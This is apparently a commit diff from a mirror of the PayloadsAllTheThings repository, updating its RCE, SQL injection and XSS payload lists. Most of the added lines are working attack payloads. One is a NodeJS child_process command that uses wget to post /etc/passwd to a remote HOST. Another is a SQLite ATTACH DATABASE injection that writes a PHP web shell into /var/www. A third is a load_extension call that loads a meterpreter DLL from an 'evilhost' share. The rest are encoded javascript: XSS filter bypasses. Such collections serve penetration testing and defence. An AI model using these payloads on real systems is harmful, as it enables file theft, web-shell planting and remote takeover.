mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Updated XSS,SQL,RCE
This commit is contained in:
parent
9f66d48f2b
commit
2fa9683b8c
@ -3,7 +3,7 @@ Remote code execution is a security vulnerability that allows an attacker to exe
|
||||
|
||||
|
||||
## Exploits
|
||||
Normal code execution
|
||||
Normal code execution, execute the command and voila :p
|
||||
```
|
||||
cat /etc/passwd
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
@ -37,7 +37,7 @@ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
|
||||
NodeJS Code execution
|
||||
```
|
||||
require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')
|
||||
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
@ -101,6 +101,21 @@ PostgreSQL Error Based - Basic
|
||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||
```
|
||||
|
||||
# SQLite
|
||||
Remote Command Execution using SQLite command - Attach Database
|
||||
```
|
||||
ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
|
||||
CREATE TABLE lol.pwn (dataz text);
|
||||
INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
|
||||
```
|
||||
|
||||
Remote Command Execution using SQLite command - Load_extension
|
||||
```
|
||||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||
```
|
||||
Note: By default this component is disabled
|
||||
|
||||
|
||||
# Other usefull payloads
|
||||
|
||||
Polyglot injection (multicontext)
|
||||
|
@ -99,6 +99,20 @@ javascript:prompt(1)
|
||||
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
|
||||
|
||||
javascript:confirm(1)
|
||||
|
||||
We can encode the "javacript:" in Hex/Octal
|
||||
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
|
||||
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
|
||||
\152\141\166\141\163\143\162\151\160\164\072alert(1)
|
||||
|
||||
We can use a 'newline character'
|
||||
java%0ascript:alert(1) - LF (\n)
|
||||
java%09script:alert(1) - Horizontal tab (\t)
|
||||
java%0dscript:alert(1) - CR (\r)
|
||||
|
||||
Using the escape character
|
||||
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
|
||||
|
||||
```
|
||||
|
||||
XSS with data:
|
||||
|
Loading…
Reference in New Issue
Block a user